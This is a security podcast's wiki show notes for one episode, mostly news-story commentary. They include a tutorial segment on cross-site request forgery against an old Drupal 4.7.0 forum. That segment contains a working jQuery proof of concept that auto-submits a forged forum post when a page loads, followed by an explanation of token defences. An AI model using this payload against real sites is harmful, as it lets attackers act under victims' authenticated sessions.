From Security Weekly Wiki
Jump to navigationJump to search

Episode Media

Episode 315


Announcements & Shameless Plugs

PaulDotCom Security Weekly - Episode 315 for Thursday January 10th, 2013

Interview: Kati Rodzon and Mike Murray

Kati Rodzon is the manager of Security Behavior Deisgn for MAD Security. Her last 9 years have been spent studying psychology and ways to modify human behavior. From learning about the power of social pressure on groups, to how subtle changes in reinforcement can drastically change individual behavior, Kati has spent the better part of a decade learning how humans work and now applies that to security awareness.

Mike Murray has spent more than a decade helping companies to protect their information by understanding their vulnerability posture from the perspective of an attacker. Mike co-founded MAD Security, where he leads engagements to help corporate and government customers understand and protect their security organization.

Tech Segment - Cross-Site Request Forgery (CSRF or XSRF)


  • We are in the process of archiving and cataloging our technical segments, please visit the PaulDotCom Technical Library and we indexed all of the interviews we have conducted. We are also working on updating all of the articles, so check the newsletter or if you want to help in exchange for some free guidance and security training please email me.

CSRF Primer

Yeah, CSRF has been discussed on PaulDotCom a few times before (check out the new and growing technical library) and John has done videos on it. But it's back. We're not showing you anything new or revolutionary, as this was Patrick the Intern's first project, to get acquainted with the attack, how it works and set up a working exploit. For this, we're using a very old (6+ years) version of Drupal, version 4.7.0 to be specific. This vulnerability has long been fixed and if you use Drupal's own forms API, you should not have to worry about CSRF in your Drupal sites.

If you want history and background on CSRF like the "confused deputy" story and links, check out Paul's tech segment on it from Episode 82. However, in a nutshell, what this attack does is lets us use an authenticated user's session to perform some action on a site. In this case, a message board. Our message board is set up with permissions so that only users with valid credentials may post to the board. Anyone in the world can read the board, but you need a username and password to post. With CSRF, if we're able to merely get an authenticated user to open a web page, we are able to post what we want to the forum.

How it works

Because we have access to the form, we can view the source and get the necessary information, which is the form's action and the form's variables that need to be sent with the request. For my forum, this is what it looks like, with some unimportant parts removed, like visual styling.

The Code

 <form action="/drupal-4.7.0/?q=node/add/forum/2"  method="post" >

<input type="hidden" name="edit[form_id]" id="edit-form_id" value="forum_node_form"  />

    <select name="edit[taxonomy][1]"> 
      <option value="1">Hacking</option>
      <option value="2">-CSRF</option> 
      <option value="3">-XSS</option> 
      <option value="4">-SQLi</option> 

    <input type="text" name="edit[title]" id="edit-title"  size="60" />

    <textarea cols="60" rows="20" name="edit[body]"></textarea>

 Publishing options: 
    <input type="checkbox" name="edit[status]"  value="1" /> Published
    <input type="checkbox" name="edit[moderate]" value="1" /> In moderation queue 
    <input type="checkbox" name="edit[promote]" value="1" /> Promoted to front page ...

<input type="submit" name="op" value="Submit"  class="form-submit" /> 


We see that we need to create a web page that will send a request to /drupal-4.7.0/?q=node/add/forum/2 to add a post to the forum with a taxonomy value of 2. Additionally, we need to send the Subject and Body of the post we want to have published. One part that can get easily overlooked, and we sometimes see this on various sites, the attacker leaves the message in moderation mode by not sending the correct publishing option. We'll want to include the "Published" editing status as well, to make sure our post is immediately visible. Lastly, we need to send the "op" of Submit, so the server will think the user submitted this request.

Now, we need to get an authenticated user to send the request via an HTTP post. One thing we can do is build a form that has all of these values in html <hidden> tags and then ask the user to click the button for some reason. No intelligent user is going to click the button on a form that some anonymous person sends them. So we need to step this up a bit.

The Exploit

It's not as hard to get someone to simply load a page as it is to get them to click a button on a page. So instead, we're going to add some javascript, using jQuery, and send off a POST request when the page loads. Here's the code for that:

 <head> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>

    <script> function hackMe(){ 
      $.post("/drupal-4.7.0/?q=node/add/forum/2", { 
        'edit[title]':"Cheap Viagra! Free Porn!", 
        'edit[taxonomy][1]': "2", 
        'edit[body]': "Proof of concept of CSRF! PaulDotCom Rules! Hack Naked!", 
        'edit[form_id]':"forum_node_form", 'edit[status]':"1",
	'op':"Submit"   } );

<body onLoad="hackMe()"> 

Now, we just need to get an authenticated user to load the page we've created and there we have it, the user has posted to the forum for us. Csrf-screenshot.jpg


This gets prevented by the use of random and unguessable session tokens. When the user first authenticates, a token is created and placed in that user's session. Every time the user accesses a page with a form, that token is added to the form and the session's token is compared to the value in the form request. Now when we look at the source of the form, we will not see the token for the authenticated user, we can't include it in our request and when the user loads our page, the server will reject the request.

Here is the source from a Drupal 7 blog where the token is now included:

<form action="/drupal-7/forum">
    <input type="hidden" name="form_token" value="Ptu73ZDOgo6Grf2dKmR0FyAycSo90JV9FFVfZNhENHM" />
    <input type="submit" id="edit-submit" name="op" value="Search" class="form-submit" />
    <input type="hidden" name="form_build_id" value="form-fQgMNLtO3mPU-mvfi1GZSYM9GANYdmrMowcO0JxByT0" />
    <input type="hidden" name="form_id" value="search_block_form" />

For more information on the prevention, check out the frameworks and explanations offered by OWASP


Additionally, John Wilander has talked about Stateless CSRF, which is interesting and I wanted to mention it, but I'm still working through the mechanics of it all. Basically the way I understand it, it's an alternative to a CAPTCHA. Possibly, we'll go over this in a future segment.


Paul's Stories

  1. Fun with AIX Shellcode and Metasploit
  2. Ipad Extra Screen - Fun little hack, always nice to have a spare monitor. Not so easy to bring with you on a pen test or to a conference. Pen testing is the best use case for this, as you like to have stuff running while keeping an eye on it. But you also want to be doing something else while stuff is running (e.g. password cracking while working on a SQL injection exploit). So, you can use your iPad as a second screen, pretty neat!
  3. Carving Station – RAR Files | M-unition - Carving files is useful. I plan to read through this as reversing firmware requires special carving, hoping to pick up a few tricks.
  4. What Else runs Telnets? Or - I wish more people would take the advice from Rob, boils down to Never trust the vendor to correctly install anythig, Scan your own perimeter.Never trust documentation. Never put stuff outside your firewall.
  5. $17 - I want open-source on my rifle! So cool: TrackingPoint makes "Precision Guided Firearms, or "PGFs," which are a series of three heavily customized hunting rifles, ranging from a .300 Winchester Magnum with a 22-inch barrel up to a .338 Lapua Magnum with 27-inch barrel, all fitted with advanced computerized scopes that look like something directly out of The Terminator. I'll take a .308 please :)
  6. Does Your Company Actually Need a Security Department? - And here is the answer: If you don't listen to your security department and never do anything they tell you, then you do not need a security department.
  7. WordPress Pingback Portscanner – Metasploit Module - Nice way to scan a network!
  8. 2012: Over and Done With. - Some great advice: Get out more. Get some friends and hobbies outside infosec. I have said this a million times, but it bears repeating. If, at the end of your life, you can only look back and think about all the bullshit “Internet friendships” you’ve had (or not had), then you’ve failed. A life is supposed to be interesting, full of crazy experiences, travel, experiments (both failed and successful, doesn’t matter), and so on. and also: And, perhaps most of all, don’t get all caught up in the politics or the silly rantiness of those who have nothing better to do than sit in front of their %&* computers and bitch. You don’t have to be one of those people. I’m going to get away from that crap as much as possible in 2013 and beyond. Hopefully you will too. Yea, what he said.
  9. Airing Out Security's Dirty Laundry - Last week a former security chief with the South Carolina Department of Revenue got to live out many a frustrated CISO's fantasy. He got to say, "I told you so." Yea, in a big way too. He was the CISO, and he quit because people wouldn't listen. Then, a year later, they got hacked. Bad. I would have worn a shirt that said "I TOLD YOU SO" to the next meeting with them :)
  10. The merger of cellular and Wi-Fi: The wireless network's future - What does this mean for security? What happens when the two technologies merge? Will it be an open spectrum? Will Wifi go away? Will it be more secure? Or will there be an entirely new evolution in wireless hacking? Kind of hoping for a new evolution.
  11. Your friendly Huawei at CES: Complete with uniformed security - Those Chinese, they are so friendly, with their guards and all. Honestly, I don't think Huawei is any better or worse than most consumer embedded device manufacturers when it comes to security. They just happened to be in China and get a bad rap.
  12. 5 tough security questions (and tips on answering them) - Great interview questions? 1) How do you collaborate? 2) Why do you want this job? 3) What questions do you have for me? 4) What are ways you've prioritized and shepherded information security projects through your previous organization? 5) How will you earn and keep your seat at the table with other senior executives?
  13. Kill that Java plugin now! New 0-day exploit running wild online - I love Java 0Day, it always makes the news. Hurray for Java 0day! Lets not get crazy and actually address the client-side security issue or anything, until we do, Java 0days will be a big deal for most.

Larry's Stories

  1. Nokia Shady SSL - [Larry] - Someone theorized that certain Nokia phones were MiTM-ing SSL connections, as regular traffic seemed to be proxied. What they found was that for some sites, the certificates did not match what was suspected from a non Nokia phone. Turns out Nokia was in the middle via proxy - which they claim was to monitor performance. So, how'd they do it? The browser on the Nokia phone pre-trusts the certificates from the factory so no errors appear.
  2. MIB hackers? - [Larry] - Hacker hides source code to the "remote control virus" in an SD card hidden on a stray cat's collar. How many stray cats wear collars?
  3. NTLM broken - [Larry] - well, no duh, but I think that this is the last nail in the coffin for putting together items that have been around for a long time. This one infers using the NTLM challenge response to generate the hashes based on the weaknesses in MSCHAPv2 in order to recover and bruteforce hashes with cloudcracker. MATH HARD!
  4. Creating better passwords - [Larry] - "Your password needs to contain a capital letter, a number, an emoji, 8 elements from the Periodic Table and a plot containing a protagonist with some character development and a twisted ending."
  5. Oh McAffee, yousoooo craaaazy - [Larry] - So, JM allegedly "bribes" Belize officials with free laptops infested with remote monitoring malware (that he allegedly wrote according to some articles - SEE I KNEW IT! AV VENDORS WRITE THE VIRUSES. Self fulfilling prophecy and all that…) in which he used to spy on said officials after his problem with the law. He also claims to have tried to infiltrate the phone company to monitor their phone calls. Ummm. One, you may have heard of this guy called Kevin Mitnick who went to to prison for a long time for doing similar things. Two, admitting to a crime (regardless of country) while you are already up shit's creek is probably counterproductive to your plans.

Patrick's Stories

  1. New Java 0day - Recommendation? Unplug Java browser plugin, Brian Krebs explains how
  2. Windows Technical Support Calls Ars Again - If you missed it, "Windows" previously called and the entire process was documented. Well, they tried again. With the same guy.
  3. Mastercard Defaced - Old version of WordPress, and left the readme.html file available.
  4. Forbes.com asks for your contact list, but then actually requires it, simply to leave a comment on articles. But then they send the data off to gigya.com, a social media infrastructure business. What might they need my email contact list for?

Jack's Epic Beard Speaks!

  1. Career Advice from Moxie Marlinspike. Good stuff, and as with most of Moxie's insights, he has some unique perspectives.
  2. So you dumped Adobe Reader for security and moved to Foxit. Well, don't feel safe- another critical vulnerability found in Foxit
  3. Living like a rockstar including the world travel, and prison. Zeus botmaster arrested in Thailand

Allison's Stuff

  1. Stylometric Analysis to Track Anonymous Users This is a fascinating read. Maybe if we are lucky they will release the tool they used for this.
  2. Putin urges FSB to pay attention to counterintelligence, resistance to cyber crime I wonder if this signals a change in Russia's attitude towards hacking. Time will tell.
  3. Dutch government aims to shape ethical hackers' disclosure practices This is an interesting step forward by the Dutch government. One of the difficulties with responsible disclosure is if the flaw is in a live service, companies might try to sue. I'm no lawyer, but is this the first instance of government protection for ethical hackers?
  4. The Japanese cat that holds the clues to an internet prankster Japanese hacker uses a remote control virus to make bomb threats, authorities arrest the virus victims and extract confessions from them- only to be embarrassed because the hacks continued while the victims remain in custody. Now this cat has been found, wearing an sd card on its collar. The SD card contains information which only the virus writer should know.